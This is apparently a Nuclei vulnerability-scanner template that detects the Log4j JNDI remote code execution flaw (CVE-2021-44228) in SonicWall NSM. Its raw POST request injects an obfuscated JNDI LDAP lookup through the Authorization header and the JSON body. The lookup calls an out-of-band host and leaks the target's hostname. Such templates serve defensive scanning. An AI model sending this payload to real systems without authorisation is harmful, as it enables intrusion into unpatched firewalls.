72 lines
2.5 KiB
YAML
72 lines
2.5 KiB
YAML
|
id: sonicwall-nsm-log4j-rce
|
||
|
|
||
|
info:
|
||
|
name: Sonicwall NSM - Remote Code Execution (Apache Log4j)
|
||
|
author: shaikhyaser, yaser_s
|
||
|
severity: critical
|
||
|
description: |
|
||
|
Sonicwall NSM is susceptible to Log4j JNDI remote code execution. SonicWall Network Security Manager (NSM) allows you to centrally orchestrate all firewall operations error-free, see and manage threats and risks across your firewall ecosystem from one place, and stay connected and compliant.
|
||
|
reference:
|
||
|
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||
|
cvss-score: 10
|
||
|
cve-id: CVE-2021-44228
|
||
|
cwe-id: CWE-77
|
||
|
metadata:
|
||
|
verified: true
|
||
|
max-request: 1
|
||
|
tags: cve,cve2021,rce,jndi,log4j,soniwall,oast,kev
|
||
|
variables:
|
||
|
rand1: '{{rand_int(111, 999)}}'
|
||
|
rand2: '{{rand_int(111, 999)}}'
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /api/sonicos/auth HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
X-Snwl-Timer: no-reset
|
||
|
Authorization: Digest username="${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}", realm="admin-users@x.x.x.x", uri="/api/sonicos/auth", algorithm=SHA-256
|
||
|
Content-Type: application/json
|
||
|
Accept: application/json, text/plain, /
|
||
|
X-Snwl-Api-Scope: extended
|
||
|
Origin: {{RootURL}}
|
||
|
Referer: {{RootURL}}/
|
||
|
Connection: close
|
||
|
|
||
|
{"override":false,"snwl":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/test}"}
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: interactsh_protocol # Confirms the DNS Interaction
|
||
|
words:
|
||
|
- "dns"
|
||
|
|
||
|
- type: regex
|
||
|
part: interactsh_request
|
||
|
regex:
|
||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
|
||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
|
||
|
|
||
|
extractors:
|
||
|
- type: kval
|
||
|
kval:
|
||
|
- interactsh_ip
|
||
|
- interactsh_ip
|
||
|
|
||
|
- type: regex
|
||
|
group: 2
|
||
|
regex:
|
||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
|
||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
|
||
|
part: interactsh_request
|
||
|
|
||
|
- type: regex
|
||
|
group: 1
|
||
|
regex:
|
||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
|
||
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
|
||
|
part: interactsh_request
|